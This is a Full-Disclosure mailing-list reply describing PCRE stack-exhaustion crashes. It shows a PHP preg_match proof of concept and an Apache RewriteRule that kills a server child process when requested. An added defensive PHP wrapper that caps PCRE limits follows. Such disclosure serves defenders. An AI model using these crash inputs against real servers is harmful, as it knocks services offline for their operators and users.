
Re: [Full-disclosure] New Opera 11.51 PoC Denial of Service (pigtail23)



Stack exhaustion. It seems to be a recursion problem for a basic regular
expression. The same or a similar problem exists in PCRE 8.12, allowing
multiple applications to be crashed.

cx@cx64:/www$ cat crash0.php
<?php
preg_match("/((.*)((!?.*)+)\\w+)/iU",str_repeat(" ",4096),$exxx);
?>
cx@cx64:/www$ php crash0.php
Segmentation fault

or, some time ago, for Apache:

127# cat .htaccess
RewriteEngine On
RewriteBase   /rcrash
RewriteRule gun((.*){2000,}(\s*){2000,}.*) /ygy
127# curl http://127.0.0.1/rcrash/gun
curl: (52) Empty reply from server

[Mon Jul 11 02:40:39 2011] [notice] child pid 1343 exit signal Illegal
instruction (4)

Program received signal SIGSEGV, Segmentation fault.
0x08097a9b in match (eptr=0xbb777b07 "", ecode=0xbb76ab6f "*\bB",
    offset_top=8, md=0xbfbfe284, ims=0, eptrb=0xbfa02014, flags=2)
    at pcre.c:7997
7997        c = *ecode++ - OP_TYPESTAR;

That is the same problem.

--
Best Regards
pub   4096R/D6E5B530 2010-09-19
uid                  Maksymilian Arciemowicz (cx) <max@xxxxxxxx>
sub   4096R/58BA663C 2010-09-19

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
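
A defensive counterpart to the crash0.php case in the message above, as an added example that is not part of the original post: it lowers PHP's `pcre.recursion_limit` and `pcre.backtrack_limit` around a single match and checks `preg_last_error()`, so the engine reports an error instead of recursing until the stack runs out. The helper name `guarded_preg_match` and the limit values are assumptions to tune per host.

```php
<?php
// Added example, not from the original post. guarded_preg_match() is a
// hypothetical helper; the default limits below are assumed values.

/**
 * preg_match() with lowered PCRE limits, local to this one call.
 * Returns 1 or 0 like preg_match(); throws when the engine gives up.
 */
function guarded_preg_match(string $pattern, string $subject, ?array &$matches = null,
                            int $recursionLimit = 1000, int $backtrackLimit = 100000): int
{
    // Save the current settings so the change does not leak to other callers.
    $oldRecursion = ini_get('pcre.recursion_limit');
    $oldBacktrack = ini_get('pcre.backtrack_limit');
    ini_set('pcre.recursion_limit', (string) $recursionLimit);
    ini_set('pcre.backtrack_limit', (string) $backtrackLimit);

    try {
        $result = @preg_match($pattern, $subject, $matches);
        $error  = preg_last_error();
    } finally {
        ini_set('pcre.recursion_limit', (string) $oldRecursion);
        ini_set('pcre.backtrack_limit', (string) $oldBacktrack);
    }

    // Any engine error counts as a refusal. With the PCRE JIT enabled the
    // failure may be reported as PREG_JIT_STACKLIMIT_ERROR instead.
    if ($result === false || $error !== PREG_NO_ERROR) {
        $names = [
            PREG_INTERNAL_ERROR        => 'internal error',
            PREG_BACKTRACK_LIMIT_ERROR => 'backtrack limit reached',
            PREG_RECURSION_LIMIT_ERROR => 'recursion limit reached',
            PREG_JIT_STACKLIMIT_ERROR  => 'JIT stack limit reached',
        ];
        throw new RuntimeException('PCRE gave up: ' . ($names[$error] ?? "error code $error"));
    }
    return $result;
}

// Pattern and subject taken from crash0.php in the message above.
try {
    $r = guarded_preg_match("/((.*)((!?.*)+)\\w+)/iU", str_repeat(" ", 4096), $m);
    echo "engine stayed within limits, result = $r\n";
} catch (RuntimeException $e) {
    echo $e->getMessage(), "\n";
}
```

The same limits can be set globally in php.ini; whether a given value is low enough depends on the stack size available to the PHP process.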